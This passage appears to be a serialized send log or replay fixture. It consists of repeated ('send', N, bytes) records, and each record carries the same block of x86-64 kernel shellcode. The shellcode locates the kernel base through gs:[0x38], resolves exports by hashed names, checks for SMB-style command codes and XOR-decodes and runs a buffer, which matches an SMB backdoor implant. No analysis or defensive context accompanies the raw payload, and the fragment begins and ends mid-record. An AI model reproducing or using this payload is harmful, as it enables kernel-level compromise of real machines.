\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 9, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 11, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\